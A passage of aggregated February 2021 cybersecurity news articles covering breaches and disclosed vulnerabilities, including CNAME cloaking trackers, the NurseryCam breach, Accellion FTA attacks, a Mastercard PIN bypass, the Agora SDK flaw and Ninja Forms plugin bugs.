In other words, CNAME cloaking makes tracking code look like it's first-party when in fact, it is not, with the resource resolving through a CNAME that differs from that of the first party domain.
Not surprisingly, this tracking scheme is rapidly gaining traction, growing by 21% over the past 22 months.
Cookies Leak Sensitive Information to Trackers
The researchers, in their study, found this technique to be used on 9.98% of the top 10,000 websites, in addition to uncovering 13 providers of such tracking "services" on 10,474 websites.
What's more, the study cites a "targeted treatment of Apple's web browser Safari" wherein ad tech company Criteo switched specifically to CNAME cloaking to bypass privacy protections in the browser.
Given that Apple has already rolled out some lifespan-based defenses for CNAME cloaking, this finding is likely to be more reflective of devices that don't run iOS 14 and macOS Big Sur, which support the feature.
Perhaps the most troubling of the revelations is that cookie data leaks were found on 7,377 sites (95%) out of the 7,797 sites that used CNAME tracking, all of which sent cookies containing private information such as full names, locations, email addresses, and even the authentication cookies to trackers of other domains without the user's explicit affirmation.
"It is actually ridiculous even, because why would the user consent to a third-party tracker receiving totally unrelated data, including of sensitive and private nature?," asks Olejnik.
With many CNAME trackers included over HTTP as opposed to HTTPS, the researchers also raise the possibility that a request sending analytics data to the tracker could be intercepted by a malicious adversary in what's a man-in-the-middle (MitM) attack.
Furthermore, the increased attack surface posed by including a tracker as same-site could expose the data of a website's visitors to session fixation and cross-site scripting attacks, they caution.
The researchers said they worked with the tracker developers to address the aforementioned issues.
Mitigating CNAME Cloaking
While Firefox doesn't ban CNAME cloaking out of the box, users can download an add-on like uBlock Origin to block such sneaky first-party trackers. Incidentally, the company yesterday began rolling out Firefox 86 with Total Cookie Protection that prevents cross-site tracking by "confin[ing] all cookies from each website in a separate cookie jar."
On the other hand, Apple's iOS 14 and macOS Big Sur come with additional safeguards that build upon its ITP feature to shield third-party CNAME cloaking, although it doesn't offer a means to unmask the tracker domain and block it right at the outset.
"ITP now detects third-party CNAME cloaking requests and caps the expiry of any cookies set in the HTTP response to seven days," Wilander detailed in a write-up in November 2020.
So does Brave browser, which last week had to release emergency fixes for a bug that stemmed as a result of adding CNAME-based ad-blocking feature and in the process sent queries for .onion domains to public internet DNS resolvers rather than through Tor nodes.
Chrome (and by extension, other Chromium-based browsers) is the only glaring omission, as it neither blocks CNAME cloaking natively nor makes it easy for third-party extensions to resolve DNS queries by fetching the CNAME records before a request is sent unlike Firefox.
"The emerging CNAME tracking technique [...] evades anti-tracking measures," Olejnik said. "It introduces serious security and privacy issues. User data is leaking, persistently and consistently, without user awareness or consent. This likely triggers GDPR and ePrivacy related clauses."
"In a way, this is the new low," he added.
Daycare Webcam Service Exposes 12,000 User Accounts
24.2.2021 Hacking Threatpost
NurseryCam suspends service across 40 daycare centers until a security fix is in place.
NurseryCam, a webcam service used across 40 daycare centers in the U.K. by parents who want to keep a watchful eye on their babies, has shut down following a data breach. The breach exposed the personal data of about 12,000 users to an attacker who said he or she was trying to improve the service’s security.
The attacker was able to find a “loophole” in the system, according to reports; NurseryCam was said to be alerted to the breach last Friday afternoon, prompting the company to send a notice to its users. By Saturday, the NurseryCam service was shut down while a fix is being sorted out.
The person behind the attack told the Register that they were able to get real names, usernames, email addresses and encrypted passwords for 12,000 accounts and dump them online.
NurseryCam told the BBC that it doesn’t believe anyone watched the webcam without permission; instead, the director for NurseryCam and sister companies Meta Technologies and FootfallCam, Melissa Kao, told BBC the person behind the breach contacted the company to report the incident.
“He stated he has no intention to use this to do any harm [and] wants to see NurseryCam raise the overall standards of our security measures,” she said.
NuseryCam’s Well-Known Vulnerabilities
This latest incident comes after the company was given repeated warnings by users and infosec professionals that their internet-of-things (IoT) system’s security was deeply flawed.
IoT security researcher Andrew Tierney has been raising the alarm about NurseryCam’s security dating back to 2015, when it became clear that the IP address, username and password for the DVR in the daycare center, “are leaked in the HTML source when viewing the cameras using ActiveX,” he wrote.
In January, Tierney reported that the usernames and passwords given to parents to access the remote video baby monitor are all very similar to one another if not exactly the same in some cases. That means that whoever had access at one time or another could access live streams indefinitely.
Further, he warned that the system is not protected with TLS to encrypt the nursery’s video streams, and that the service shared administrator usernames and passwords with parents, with credentials used across multiple nurseries.
“This is analogous to your local bank giving you the keys to their vault and just trusting that you will only take your money,” Tierney told Bitdefender.
Several months later, another parent, reported the admin username and password were visible in the browser. And just days ago, Tierney reported another parent said they were issued the same username and password from 2015.
“I disclosed the same issue in NurseryCam, inferred from the reverse engineering of their mobile app,” Tierney said. “Once a parent had confirmed the issues had been disclosed previously, I publicly disclosed immediately.”
The Register spoke with a business customer of FootfallCam who asked not to be identified, but said, “Over the four years we have had the devices we have highlighted some other issues to FootfallCam,” the customer told The Register. “At one point the FTP server which houses the ‘verification videos’ was publicly available.”
Parents who use the NurseryCam service told The Register they had reported vulnerabilities to the company, some were addressed, while others felt the response was inadequate.
Tierney told BBC he was also contacted by the attacker who was able to steal NurseryCam’s user data last Friday and reached out to the company to offer his assistance. Kao told BBC she did not think the previous vulnerabilities reported by Tierney has anything to do with the latest breach.
“NurseryCam sincerely apologizes to all our parent users and nurseries for the incident. We are very sorry,” she said.
An attacker was able to siphon audio feeds from multiple Clubhouse rooms
23.2.2021 Hacking Securityaffairs
An attacker demonstrated this week that Clubhouse chats are not secure, he was able to siphon audio feeds from “multiple rooms” into its own website
While the popularity of the audio chatroom app Clubhouse continues to increase experts are questioning the security and privacy level it offers to its users.
Recently the company announced it is working to enhance the security of its platform and to avoid threat actors to access audio chats. Unfortunately, a group of attackers has proved the platform’s live audio can be siphoned.
Over the weekend, an unidentified attacker was able to stream Clubhouse audio feeds from multiple rooms into their own third-party website.
In response to the malicious activity, the company permanently banned the account used by the attacker and deployed new “safeguards” to prevent similar attacks in the future, but ClubHouse was not able to ensure that it will not happen again.
Representatives of the Stanford Internet Observatory declared that users should assume all conversations are being recorded by the company, a circumstance that raises concerns because they have no information on how the conversations are stored.
“Clubhouse cannot provide any privacy promises for conversations held anywhere around the world,” said Alex Stamos, director of Stanford Internet Observatory and former Facebook CSO.
The privacy questions raised is not limited to way data are stored, experts like Stamos pointed out that Clubhouse implements back-end operations with the support of the Chinese start-up Agora Inc..
“Clubhouse’s dependence on Agora raises extensive privacy concerns, especially for Chinese citizens and dissidents under the impression their conversations are beyond the reach of state surveillance, Stamos said.” reported Bloomberg.
Agora responded to the privacy concerns saying that it doesn’t store personally identifiable information of its clients.
Over the weekend, cybersecurity expert Robert Potter noticed a user found a way to remotely share his login with a third-party site.
The measures implemented by the company were not publicly disclosed, it likely introduced some limitation in the use of third-party applications to access chatroom audio without actually entering a room. Another mitigation could consist of limiting the number of rooms a user can enter simultaneously, as suggested by Jack Cable from a Stanford Internet Observatory.
Attacks Targeting Accellion Product Linked to FIN11 Cybercrime Group
23.2.2021 Hacking Securityweek
The hacking group behind the recent cyber-attack targeting Accellion’s FTA file transfer service appears to be linked to a threat actor known as FIN11, security researchers with FireEye’s Mandiant division reveal.
The attacks on FTA, a soon-to-be-retired service, started in mid-December 2020 and resulted in the compromise of data pertaining to multiple Accellion customers. As part of the attack, the adversaries targeted multiple vulnerabilities in the file transfer service.
Some of the affected Accellion customers include grocery and pharmacy chain Kroger, Australian Securities and Investments Commission (ASIC), U.S.-based law firm Jones Day, the Office of the Washington State Auditor (SAO), the Reserve Bank of New Zealand, and Singapore telecoms firm Singtel.
The attackers abused multiple vulnerabilities in FTA to gain access to and exfiltrate data, namely CVE-2021-27101 (SQL injection), CVE-2021-27102 (OS command execution), CVE-2021-27103 (SSRF), and CVE-2021-27104 (OS command execution).
Accellion says that all of these vulnerabilities have already been addressed and that, out of “300 total FTA clients, fewer than 100 were victims of the attack,” with fewer than 25 suffering “significant data theft.”
“Accellion strongly recommends that FTA customers migrate to kiteworks, Accellion’s enterprise content firewall platform. These exploits apply exclusively to Accellion FTA clients: neither kiteworks nor Accellion the company were subject to these attacks,” Accellion said on Monday.
FireEye’s Mandiant security researchers have been tracking both the activity surrounding the exploitation of the Accellion FTA zero-day vulnerabilities and the data theft that resulted from the cyber-attack, and say they have discovered a connection between the attacks, extortion attempts related to the stolen data, and the FIN11 group.
A financially-motivated threat actor, FIN11 was previously described as a TA505 spin-off, engaging in ransomware and extortion activities that typically start with phishing emails. Previously, the attackers were associated with the use of the FlawedAmmyy and the CLOP ransomware.
Tracked as UNC2546, the adversary that targeted FTA exploited the SQL injection vulnerability for initial access, which allowed them to retrieve a key used in conjunction with a request to a specific file, followed by the execution of the built-in Accellion utility admin.pl and the deployment of a web shell.
Dubbed DEWMODE, the web shell allowed the attackers to fetch a list of available files and corresponding metadata (file ID, filename, path, recipient, and uploader) from a MySQL database, as well as to download the files themselves.
Weeks after the data theft occurred, the security researchers observed extortion attempts related to the data. The extortion emails received by the victims threatened to make the information public on the “CL0P^_- LEAKS” .onion website, which Mandiant has associated with a different actor, tracked as UNC2582.
“Despite tracking the exploitation and extortion activity in separate threat clusters we have observed at least one case where an actor interacted with a DEWMODE web shell from a host that was used to send UNC2582-attributed extortion email,” Mandiant says.
The UNC2582 threat actor, the researchers explain, initially sends extortion emails to a small number of addresses within the target organization. If no reply is received in a timely manner, the messages are sent to multiple other addresses.
Furthermore, the adversary appears to be following through with the threats, publishing victim data on the CL0P^_- LEAKS shaming website. Recently, information stolen from at least two organizations affected by the FTA cyber-attack was published on the site.
Mandiant also discovered some overlaps between the UNC2582 and FIN11 infrastructure, as some of the email messages were sent from IP addresses and/or email accounts that FIN11 previously used in various phishing attacks.
While FIN11 is known to be pausing activities during the winter holidays, the recent hiatus overlaps with UNC2582’s data theft extortion activity. Furthermore, links that the extortionists sent to their victims were directed to websites that were previously used in ransomware and data theft extortion campaigns attributed to FIN11.
The researchers also identified overlaps between UNC2546 and FIN11 activities, such as the targeting of the same organizations, and the use of an IP address (to communicate with a DEWMODE web shell) that was in a network frequently used by FIN11 for a piece of malware named FRIENDSPEAK.
“The overlaps between FIN11, UNC2546, and UNC2582 are compelling, but we continue to track these clusters separately while we evaluate the nature of their relationships. One of the specific challenges is that the scope of the overlaps with FIN11 is limited to the later stages of the attack life cycle,” Mandiant concludes.
Credential-Stuffing Attack Targets Regional Internet Registry
20.2.2021 Hacking Threatpost
RIPE NCC, the regional Internet registry for Europe, West Asia, and the former Soviet Union, said attackers attempted a credential-stuffing attack against its single-sign on service.
Regional internet registry RIPE NCC is warning of a credential-stuffing attack against its single sign-on service, RIPE NCC Access, and is encouraging users to implement two-factor authentication (2FA).
Located in Amsterdam, the Réseaux IP Européens Network Coordination Centre (RIPE NCC) is the regional internet registry for Europe, Western Asia and the former Soviet Union. RIPE NCC said that the attack, which occurred last weekend, caused “some downtime.” However, it said that preliminary investigations do not yet reveal that any single sign-on (SSO) accounts have been compromised.
“We would like to ask you to enable two-factor authentication on your RIPE NCC Access account if you have not already done so, to ensure that your account is secure,” the RIPE NCC told account holders in a Thursday security notice. “In general, using two-factor authentication across all your accounts can help limit your exposure to such attacks.”
What is RIPE NCC?
A regional internet registry is an organization that manages the registration of internet number resources within various regions worldwide. Such “internet number resources” include IPv4 and IPv6 addresses – which provide the underlying technology making it possible for people to connect their devices to the web — and autonomous system numbers (ASNs), which uniquely identify each network on the internet.
RIPE NCC is one of five regional internet registries providing internet resource allocations and registration services, which together support the internet globally.
RIPE NCC has 20,000 members from more than 75 countries. These members can receive and register internet number resource allocations, and they are then responsible for distributing and registering these resources at a local level.
In the case of the credential-stuffing attack against RIPE NCC, “the data that could be exposed are internet sources such as IP addresses allocated to internet providers, hosting providers and organizations,” Niamh Muldoon, global data protection officer with OneLogin, told Threatpost.
If they were able to access this data, “attackers could then use these details to try and masquerade as one of these providers and/or use the information to build intelligence to identify a vulnerable part of the network to try and exploit,” Muldoon explained.
What is a Credential-Stuffing Attack?
A credential-stuffing attack occurs when a cybercriminal utilizes stolen account credentials and attempts to match them up against a web application or service via large-scale, automated login requests. The aim of this attack is to achieve unauthorized access to accounts.
“Credential-stuffing attacks continue to be the most common opportunistic attack, just because the barrier of entry is low,” Marcus Hartwig, manager of Security Analytics at Vectra, told Threatpost. “Databases of credentials from previous data breaches are widely available, often for free, and have a high success ratio, and preventative measures like multifactor authentication (MFA) are easy to circumvent for determined attackers.”
Credential stuffing has been commonly utilized in recent years, causing targeted companies like The North Face (hit in November) Dunkin Donuts (hit twice, in December 2018 and February 2019) and Spotify (hit twice, in December and in February) to force password resets for impacted users.
RIPE NCC: Enabling Two-Factor Authentication
RIPE NCC said that the attack has been mitigated. It also said it is now taking steps to ensure its services are “better protected against such threats in the future” – including asking users to enable 2FA, where a one-time code will be required to sign in.
“If we do find that an account has been affected in the course of our investigations, we will contact the account holder individually to inform them,” according to RIPE NCC.
Security experts like Joseph Carson, advisory CISO at Thycotic, said that the the incident points to the importance of password hygiene and 2FA – especially as credential-stuffing attacks continue to increase.
“An important lesson that must be learned from this is that we should never reuse passwords,” Carson told Threatpost. “Companies who offer authentication and log into their website must also move away from having a password as the only security control. 2FA must be enabled for all customers as this reduces the risks of those who reuse passwords from become a victim of a cybercrime or credential stuffing from being successful.”
New Hack Lets Attackers Bypass MasterCard PIN by Using Them As Visa Card
20.2.2021 Hacking Thehackernews
Cybersecurity researchers have disclosed a novel attack that could allow criminals to trick a point of sale terminal into transacting with a victim's Mastercard contactless card while believing it to be a Visa card.
The research, published by a group of academics from the ETH Zurich, builds on a study detailed last September that delved into a PIN bypass attack, permitting bad actors to leverage a victim's stolen or lost Visa EMV-enabled credit card for making high-value purchases without knowledge of the card's PIN, and even fool the terminal into accepting unauthentic offline card transactions.
"This is not just a mere card brand mixup but it has critical consequences," researchers David Basin, Ralf Sasse, and Jorge Toro said. "For example, criminals can use it in combination with the previous attack on Visa to also bypass the PIN for Mastercard cards. The cards of this brand were previously presumed protected by PIN."
password auditor
Following responsible disclosure, ETH Zurich researchers said Mastercard implemented defense mechanisms at the network level to thwart such attacks. The findings will be presented at the 30th USENIX Security Symposium in August later this year.
A Card Brand Mixup Attack
Just like the previous attack involving Visa cards, the latest research too exploits "serious" vulnerabilities in the widely used EMV contactless protocol, only this time the target is a Mastercard card.
At a high level, this is achieved using an Android application that implements a man-in-the-middle (MitM) attack atop a relay attack architecture, thereby allowing the app to not only initiate messages between the two ends — the terminal and the card — but also to intercept and manipulate the NFC (or Wi-Fi) communications to maliciously introduce a mismatch between the card brand and the payment network.
Put differently, if the card issued is Visa or Mastercard branded, then the authorization request needed for facilitating EMV transactions is routed to the respective payment network. The payment terminal recognizes the brand using a combination of what's called a primary account number (PAN, also known as the card number) and an application identifier (AID) that uniquely identifies the type of card (e.g., Mastercard Maestro or Visa Electron), and subsequently makes use of the latter to activate a specific kernel for the transaction.
An EMV Kernel is a set of functions that provides all the necessary processing logic and data that is required to perform an EMV contact or contactless transaction.
The attack, dubbed "card brand mixup," takes advantage of the fact that these AIDs are not authenticated to the payment terminal, thus making it possible to deceive a terminal into activating a flawed kernel, and by extension, the bank that processes payments on behalf of the merchant, into accepting contactless transactions with a PAN and an AID that indicate different card brands.
"The attacker then simultaneously performs a Visa transaction with the terminal and a Mastercard transaction with the card," the researchers outlined.
The attack, however, necessitates that it meets a number of prerequisites in order to be successful. Notably, the criminals must have access to the victim's card, besides being able to modify the terminal's commands and the card's responses before delivering them to the corresponding recipient. What it doesn't require is the need to have root privileges or exploit flaws in Android so as to use the proof-of-concept (PoC) application.
But the researchers note a second shortcoming in the EMV contactless protocol could let an attacker "build all necessary responses specified by the Visa protocol from the ones obtained from a non-Visa card, including the cryptographic proofs needed for the card issuer to authorize the transaction."
Mastercard Adds Countermeasures
Using the PoC Android app, ETH Zurich researchers said they were able to bypass PIN verification for transactions with Mastercard credit and debit cards, including two Maestro debit and two Mastercard credit cards, all issued by different banks, with one of the transactions exceeding $400.
In response to the findings, Mastercard has added a number of countermeasures, including mandating financial institutions to include the AID in the authorization data, allowing card issuers to check the AID against the PAN.
Additionally, the payment network has rolled out checks for other data points present in the authorization request that could be used to identify an attack of this kind, thereby declining a fraudulent transaction right at the outset.
SDK Bug Lets Attackers Spy on User’s Video Calls Across Dating, Healthcare Apps
19.2.2021 Hacking Threatpost
Apps like eHarmony and MeetMe are affected by a flaw in the Agora toolkit that went unpatched for eight months, researchers discovered.
A vulnerability in an SDK that allows users to make video calls in apps like eHarmony, Plenty of Fish, MeetMe and Skout allows threat actors to spy on private calls without the user knowing.
Researchers discovered the flaw, CVE-2020-25605, in a video-calling SDK from a Santa Clara, Calif.-based company called Agora while doing a security audit last year of personal robot called “temi,” which uses the toolkit.
Agora provides developer tools and building blocks for providing real-time engagement in apps, and documentation and code repositories for its SDKs are available online. Healthcare apps such as Talkspace, Practo and Dr. First’s Backline, among various others, also use the SDK for their call technology.
SDK Bug Could Have Impacted Millions
Due to its shared use in a number of popular apps, the flaw has the potential to affect “millions–potentially billions–of users,” reported Douglas McKee, principal engineer and senior security researcher at McAfee Advanced Threat Research (ATR), on Wednesday.
McKee said he did not find evidence of the bug is being exploited in the wild.
The flaw makes it easy for third parties to access details about setting up video calls from within the SDK across various apps due to their unencrypted, cleartext transmission. This paves the way for remote attackers to “obtain access to audio and video of any ongoing Agora video call through observation of cleartext network traffic,” according to the vulnerability’s CVE description.
Researchers reported this research to Agora.io on April 20, 2020. The flaw remained unpatched for about eight months until Dec. 17, 2020 when the company released a new SDK, version 3.2.1, “which mitigated the vulnerability and eliminated the corresponding threat to users,” McKee said.
Researchers first were alerted to an issue when, during their analysis of the temi ecosystem, they found a hardcoded key in the Android app that pairs with the temi robot. Upon further exploration, they found a connection to the Agora SDK through “detailed logging” by developers to the Agora.io dashboard, McKee said.
Upon examination of the Agora video SDK, researchers discovered that it allows information to be sent in plaintext across the network to initiate a video call. They then ran tests using sample apps from Agora to see if third parties could leverage this scenario to spy on a user.
SDK Bug Allows Attackers to Circumvent Encryption
What they discovered through a series of steps is that they can, a scenario that affects various apps using the SDK, according to McKee. Further, threat actors can hijack key details about calls being made from within apps even if encryption is enabled on the app, he said.
The first step for an attacker to exploit the vulnerability is to identify the proper network traffic he or she wants to target. ATR achieved this by building a network layer in less than 50 lines of code using a Python framework called Scapy “to help easily identify the traffic the attacker cares about,” McKee explained.
“This was done by reviewing the video call traffic and reverse-engineering the protocol,” he said. In this way researchers were able to sniff network traffic to gather information pertaining to a call of interest and then launch their own Agora video applications to join the call, “completely unnoticed by normal users,” McKee wrote.
While developers do have the option in the Agora SDK to encrypt the call, key details about the calls are still sent in plaintext, allowing attackers to acquire these values and use the ID of the associated app “to host their own calls at the cost of the app developer,” McKee explained.
However, if developers encrypt calls using the SDK, attackers can’t view video or hear audio of the call, he said. Still, while this encryption is available, it’s not widely adopted, McKee added, “making this mitigation largely impractical” for developers.
Other Apps Impacted by Faulty SDK
In fact, in addition to temi, researchers examined a cross-section of apps on Google Play that use Agora—including MeetMe, Skout and Nimo TV—and found that all four of the applications have hardcoded App IDs that allow access to call details and do not enable encryption.
“Even though the encryption functions are being called, the application developers are actually disabling the encryption based on this documentation,” McKee explained. “Without encryption enabled and the setup information passed in cleartext, an attacker can spy on a very large range of users.”
Agora did not immediately respond to an email request for comment sent by Threatpost on Thursday. ATR said the company “was very receptive and responsive to receiving” information about the vulnerability, and that after testing the SDK they “can confirm it fully mitigates CVE-2020-25605.”
SolarWinds hackers had access to components used by Azure, Intune, and Exchange
19.2.2021 Hacking Securityaffairs
Microsoft announced that SolarWinds hackers could have had access to repositories containing some components used by Azure, Intune, and Exchange.
Microsoft announced that the threat actors behind the SolarWinds supply chain attack could have had access to repositories containing the source code for a limited number of components used by Azure, Intune, and Exchange.
In December, Microsoft experts revealed that SolarWinds hackers could have compromised a small number of internal accounts and used at least one of them to view source code in a number of source code repositories.
Shortly after the disclosure of the SolarWinds attack, Microsoft confirmed that it was one of the companies breached in the recent supply chain attack, but the IT giant denied that the nation-state actors compromised its software supply-chain to infect its customers.
Frank Shaw, the corporate vice president of communications at Microsoft, confirmed that its company detected multiple malicious SolarWinds binaries in its environment.
The good news is that accounding an investigation update provided by Microsoft the attackers hackers only viewed a few individual files.
However, for some repositories, including ones for Azure, Intune, and Exchange, the attackers could download component source code.
“There was no case where all repositories related to any single product or service was accessed. There was no access to the vast majority of source code. For nearly all of code repositories accessed, only a few individual files were viewed as a result of a repository search. For a small number of repositories, there was additional access, including in some cases, downloading component source code.” reads the update provided by Microsoft.
“These repositories contained code for:
a small subset of Azure components (subsets of service, security, identity)
a small subset of Intune components
a small subset of Exchange components”
The IT giant revealed that attackers used search terms in an attempt to find secrets, such as login credentials to use for lateral movements in the corporate networks.
Microsoft added that its development policy prohibits secrets in code, it uses automated tools to verify compliance.
“Because of the detected activity, we immediately initiated a verification process for current and historical branches of the repositories. We have confirmed that the repositories complied and did not contain any live, production credentials.” continues the company.
The SolarWinds attack demonstrated the importance of embracing a Zero Trust mindset and protecting privileged credentials.
“A Zero Trust, “assume breach” philosophy is a critical part of defense. Zero Trust is a transition from implicit trust—assuming that everything inside a corporate network is safe—to the model that assumes breach and explicitly verifies the security status of identity, endpoint, network, and other resources based on all available signals and data.” concludes Microsoft.
Ninja Forms WordPress Plugin Bug Opens Websites to Hacks
18.2.2021 Hacking Threatpost
The popular plugin is installed on more than 1 million websites, and has four flaws that allow various kinds of serious attacks, including site takeover and email hijacking.
Threatpost Webinar February Promo
Click to Register
Ninja Forms, a WordPress plugin used by more than 1 million sites, contains four critical security vulnerabilities that together make it possible for a remote attacker to take over a WordPress site and create various kinds of problems.
Ninja Forms offers WordPress site designers the ability to create forms using a drag-and-drop capability, with no coding skills required.
The four bugs allow lower-privileged users (even those who have simply registered for a site) to carry out a range of malicious activity. That includes eavesdropping on site email, taking over admin accounts, installing arbitrary add-ons to a target site and redirecting site owners to malicious destinations.
Three of the bugs do require social engineering to be successful.
Bug 1: Authenticated Email Hijacking and Account Takeover with SendWP Plugin
The first bug allows attackers with subscriber-level access or above to abuse SendWP to intercept all mail traffic, including password reset links for administrative accounts, researchers said. SendWP is an email delivery and logging service intended to make mail handling with WordPress simpler.
A Ninja Forms screenshot.
Attackers with subscriber or above access to a vulnerable WordPress site could establish a SendWP connection with their own SendWP account, so that all mail from the WordPress site would be routed through and logged in the attackers SendWP account.
If exploited, this could ultimately lead to remote code execution and site takeover by using an admin account to modify theme/plugin files or uploading a malicious theme/plugin, according to Wordfence, which said the flaw also carries an estimated CVSS rating of 9.9 out of 10 (CVEs are pending for all bugs).
“At that point they can monitor all data emailed which could range from user personally identifiable information (PII) from form submissions to reports generated on your site,” researchers warned. “Further, an attacker could trigger a password reset for an administrative user account, if they could discover the username for an account.”
Accomplishing this is not that difficult, according to the Wordfence analysis, released on Tuesday.
“In order to provide this functionality, the plugin registers the AJAX action wp_ajax_ninja_forms_sendwp_remote_install,” researchers explained. “This AJAX action is tied to the function wp_ajax_ninja_forms_sendwp_remote_install_handler, that checks to see if the SendWP plugin is installed and activated. If the plugin is not currently installed, then it performs the installation and activation of the SendWP plugin.”
Once the plugin has been installed successfully, the function will return the registration url, along with the client_name, client_secret, register_url and client_url. This is used to show users the sign-up page and easily connect their WordPress instance with SendWP.
“Unfortunately, this AJAX action did not have a capability check on it, nor did it have any nonce protection, therefore making it possible for low-level users, such as subscribers, to install and activate the SendWP plugin and retrieve the client_secret key needed to establish the SendWP connection,” according to the analysis.
A potential mitigation to widespread, automated exploitation is the fact that SendWP is a paid add-on, costing $9 per month per site, researchers noted.
Bug 2: Authenticated OAuth Connection Key Disclosure
The second bug carries an estimated CVSS score of 7.7, and is present in the Ninja Forms “Add-on Manager” service, a centralized dashboard that allows users to remotely manage all purchased Ninja Forms add-ons.
According to Wordfence, attackers could establish an OAuth connection for a vulnerable WordPress site with their own account, and be able to install any purchased Add-On plugins on the target site that they choose.
In order to complete the malicious connection, attackers would need to trick the site administrator into clicking a special link to update the client_id parameter in the site database with an altered AJAX action.
“The plugin registers the AJAX action wp_ajax_nf_oauth which is used to retrieve the connection_url that contains the information necessary, like the client_secret, to establish an OAuth connection with the Ninja Forms Add-On Management portal,” according to the analysis. “Unfortunately, there was no capability check on this function.”
That means that low-level users, such as subscribers, were able to trigger the action and retrieve the connection URL needed to establish a connection with the dashboard. Attackers could also retrieve the client_id for an already established OAuth connection, researchers said.
Bug 3: Cross-Site Request Forgery to OAuth Service Disconnection
The third bug exists in the Ninja Forms Add-Ons Manager’s ability to easily disconnect an established OAuth connection with just a few clicks. This bug carries a 6.1 CVSS rating, making it medium-severity.
Attackers could send a request to disconnect the current OAuth connection – Wordfence noted that this “could be a puzzling experience for a site owner.” To do so, they would need to craft a legitimate request, host it externally, and trick an administrator into clicking a link or attachment.
“In order to provide this functionality, the plugin registered an AJAX action wp_ajax_nf_oauth_disconnect tied to the function disconnect(). The disconnect() function would simply disconnect an established connection by deleting the options associated with the connection settings in the database,” according to Wordfence. “Unfortunately, this feature did not have nonce protection.”
Bug 4: Administrator Open Redirect
The final issue is present in the OAuth connection process; it’s considered medium-severity with a CVSS score of 4.8.
To exploit this, an attacker would need to craft a special URL with the redirect parameter set to an arbitrary site, and then socially engineer an administrator into clicking the link. If successful, the administrator could be redirected to an external malicious site which could infect the administrator’s computer with malware.
“The plugin registers an AJAX action, wp_ajax_nf_oauth_connect, that is registered to the function connect() which is used to redirect a site owner back to the WordPress site’s Ninja Forms service page after the user has finished the OAuth connection process,” according to the analysis. “This function uses wp_safe_redirect to redirect site owners back to the admin.php?page=ninja-forms#services page by default.”
However, the issue is that the ‘redirect’ parameter can be swapped out with different values, to instead redirect the site administrator to an arbitrary URL supplied in that parameter.
“There is no protection on the redirection URL validating where the redirect goes, nor was there any protection to prevent an attacker from using the function to redirect a site administrator to a malicious location,” researchers explained. “There was the use of wp_verify_nonce(),however, it was commented out and rendered unusable.”
Saturday Drive, the plugin’s parent company, has patched all of the bugs, fixed in version 3.4.34.1.
WordPress Plugin Security Problems
WordPress plugins continue to present serious vulnerabilities. In January, researchers warned of two vulnerabilities (one critical) in a WordPress plugin called Orbit Fox that could allow attackers to inject malicious code into vulnerable websites and/or take control of a website.
Also in January, developers of a plugin called Popup Builder – Responsive WordPress Pop up – Subscription & Newsletter, used by WordPress websites for building pop-up ads for newsletter subscriptions, issued a patch for a serious flaw. The vulnerability could be exploited by attackers to send out newsletters with custom content, or to delete or import newsletter subscribers.
Research Shows How Solar Energy Installations Can Be Abused by Hackers
18.2.2021 Hacking Securityweek
Researchers at cybersecurity firm FireEye have analyzed a gateway device used for solar energy installations, and discovered vulnerabilities that could be useful to malicious hackers.
The targeted device is the ConnectPort X2e made by Digi International, a US-based company that provides IT, networking and IoT solutions for industrial, enterprise and smart city applications. FireEye conducted its research on a version of the device offered by Tesla under the SolarCity brand — Tesla acquired solar panel maker SolarCity in 2016.
The X2e device is a programmable gateway used for residential and small commercial solar installations. It’s typically used to read data from a solar inverter and provide a connection to cloud-based applications.
FireEye’s research involved a physical inspection of the device, an analysis of debugging interfaces, removing the NAND storage, analyzing the file system and bootloader, glitch attacks, and software exploitation.
The research led to the discovery of two vulnerabilities: one related to the existence of hardcoded credentials (CVE-2020-9306), and a privilege escalation flaw (CVE-2020-12878) — both were classified as high severity. The security holes were reported to both Tesla and Digi, and they have been patched.
According to FireEye, an attacker who has network access to the targeted device could exploit the vulnerabilities to obtain a root shell and remotely take complete control of the device.
“If an attacker is able to compromise an X2e device, they would have access to a networked device in a home or enterprise,” FireEye researchers Jake Valletta and Sam Sabetan told SecurityWeek.
“X2e’s are typically only used for data collection purposes and if compromised, an attacker could install a backdoor on the X2e which could be used to laterally move in a network, call out to a remote server for persistent access, or stage a larger attack on the victim’s network,” they added, clarifying that “this scenario holds for any compromised IoT device on a network.”
The researchers noted that the device is typically behind a residential firewall so remote attacks directly from the internet should not be possible, unless the user has intentionally made it accessible from the web.
“However, ConnectPort X2e’s are used for various purposes and are not exclusive to solar installations. Therefore, it is possible some X2e devices, based on their use case, are exposed to the Internet,” they explained.
FireEye has made available detailed technical information on its research into the X2e device [part 1 and part 2].
Misconfigured Baby Monitors Allow Unauthorized Viewing
17.2.2021 Hacking Threatpost
Hundreds of thousands of individuals are potentially affected by this vulnerability.
A vulnerability affecting multiple baby monitors could allow someone to drop in and view a camera’s video stream, according to researchers. Potentially hundreds of thousands of live devices are impacted, they said.
The issue exists in the manufacturers’ implementation of the Real-Time Streaming Protocol (RTSP), which is a set of procedures used by various cameras to control their streaming media. It’s possible to misconfigure its implementation, so that no authentication is needed for unknown parties to connect, according to the SafetyDetectives cybersecurity team.
“Whilst this means that potentially harmful individuals could be able to access private images of your children, their bedrooms and possessions, this specific vulnerability is also concerning with regards to daycare centers – which are commonly known to stream video from inside kindergarten for onlooking parents and guardians,” researchers said. “If your baby monitor or any RTSP camera does not require parties to enter a password each time they connect to the video stream, the images shown on that stream are potentially unsecured, and therefore accessible to anyone.”
The specific models that the team tested that proved to be vulnerable include the Hipcam RealServer/V1.0; the webcamXP 5; and the Boa/0.94. 14rc21.
Initial research on Shodan showed large numbers of vulnerable devices connected to the internet, all over the world.
“Our team was able to identify unsecured devices either through their ‘server header,’ or their onscreen overlay that details the particular brand,” according to researchers, writing on Tuesday. “A server header is a strip of information provided with RTSP that details numerous factors, including the device type. The server header gives us evidence of which devices provide unauthorized access.”
Hundreds of Thousands of Potential Victims
The SafetyDetectives team first uncovered 110,000 open camera streams.
“Of these cameras, over half of them are being used as CCTV, providing surveillance for shops or the exterior of properties,” they explained. “Around 10 percent of these cameras are used for viewing house interiors, like living rooms or hallways. Most of the remaining cameras are baby monitors, being used to check up on children, or as cameras in child daycare centers, or retirement homes.”
Given the number of people in a daycare center at any given time, the number of individuals affected could be quite high, according to the report.
“There’s also the possibility that there are hundreds of thousands of additional streams yet undiscovered, that we simply do not have the time to sift through,” researchers said.
What Causes this Data Exposure?
The SafetyDetectives team didn’t provide granular technical details, but in general found four primary reasons for why baby monitors can become unsecured.
Devices designed for local networks are streamed over the internet.
